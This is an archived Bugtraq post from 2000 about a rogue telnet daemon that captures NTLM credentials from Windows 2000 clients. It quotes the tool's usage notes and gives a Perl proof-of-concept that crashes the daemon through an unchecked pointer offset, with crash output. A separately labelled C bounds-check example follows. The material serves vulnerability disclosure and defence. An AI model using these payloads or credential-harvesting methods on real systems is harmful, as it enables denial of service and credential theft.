Bugtraq mailing list archives
Re: Win2k Telnet.exe malicious server vulnerability
From: Jim Paris <jim () JTAN COM>
Date: Thu, 14 Sep 2000 12:04:09 -0400
/*
   NTLM telnetD v0.8
   Snarfs NTLM challenge/response by convincing w2k telnet client to
   auto-authenticate.
   Outputs auth-data in LophtCrack sniff format on stdout.

   compile: gcc -o w2kteld ntlm_telnetd.c
   run: ./w2kteld
   Then wait for w2k to telnet to you.
   for the impatient, there are always ways of making w2k telnet!
... <snip>

And if you happen to get bitten by this rogue server, it must be time
for a friendly little DoS against it. (rp->upos is used as a pointer
modifier without checking its bounds)

sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections
Connection from: 127.0.0.1
Got NTLM response token
[1]+ Segmentation fault ./ntlm_telnetd -l 1234
sardegna:~$

We are so batman. And now I'm late for class. (grr, 6.003)

-jim

#!/usr/bin/perl -w
#
# anti-ntlm-telnetd by jim@jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->recv($msg,1024);
$s->send("\xff\xfb\x25");
$s->recv($msg,1024);
$s->send("\xff\xfd");
$s->send("A"x7 .               # foo
         "\xFF" .              # length (passed to gettoken)
         "A"x7 .               # bar
         "NTLMSSP\0\x03" .     # protocol and type
         "A"x29 .              # baz
         "\xDE\xAD\xBE\xEF");  # rp->upos
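Added example, not part of the original post or of ntlm_telnetd.c: a bounds check of the kind the note about rp->upos says is missing, written against the standard NTLMSSP type 3 layout. The names ntlm3_field and build_sample and the 64-byte sample message are assumptions made for illustration; the daemon's own structures are not shown in the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Standard NTLMSSP type 3 offsets (assumption: the daemon's struct is not shown). */
#define NTLM_HDR_LEN   12  /* "NTLMSSP\0" + 32-bit message type */
#define NTLM_USER_DESC 36  /* user field: len16, maxlen16, offset32 */

static uint32_t rd_le(const uint8_t *p, int n)   /* little-endian read */
{
    uint32_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* Hypothetical helper: resolve the descriptor at `desc` to a pointer inside
 * msg. Returns 0, or -1 if a peer-supplied value leaves the received bytes. */
int ntlm3_field(const uint8_t *msg, size_t msglen, size_t desc,
                const uint8_t **out, size_t *outlen)
{
    if (msglen < NTLM_HDR_LEN || memcmp(msg, "NTLMSSP", 8) || rd_le(msg + 8, 4) != 3)
        return -1;
    if (desc < NTLM_HDR_LEN || desc > msglen || msglen - desc < 8)
        return -1;                 /* descriptor itself is truncated */
    size_t len = rd_le(msg + desc, 2);
    size_t off = rd_le(msg + desc + 4, 4);
    /* Compare by subtraction so off + len cannot wrap around. */
    if (off > msglen || len > msglen - off)
        return -1;
    *out = msg + off; *outlen = len;
    return 0;
}

/* Constructed 64-byte sample: a 4-byte user field at a chosen offset. */
const uint8_t *build_sample(uint8_t m[64], uint32_t user_off)
{
    memset(m, 0, 64);
    memcpy(m, "NTLMSSP\0\x03", 9);  /* signature, then type 3 */
    m[36] = m[38] = 4;              /* len and maxlen */
    for (int i = 0; i < 4; i++) m[40 + i] = (uint8_t)(user_off >> (8 * i));
    memcpy(m + 48, "user", 4);
    return m;
}

int main(void)
{
    uint8_t m[64]; const uint8_t *p; size_t n;
    printf("in range: %d\n", ntlm3_field(build_sample(m, 48), 64, NTLM_USER_DESC, &p, &n));
    printf("wild:     %d\n", ntlm3_field(build_sample(m, 0xEFBEADDEu), 64, NTLM_USER_DESC, &p, &n));
    return 0;
}
```

The second call uses the post's four rp->upos bytes read as a little-endian offset; the parser rejects it instead of dereferencing it.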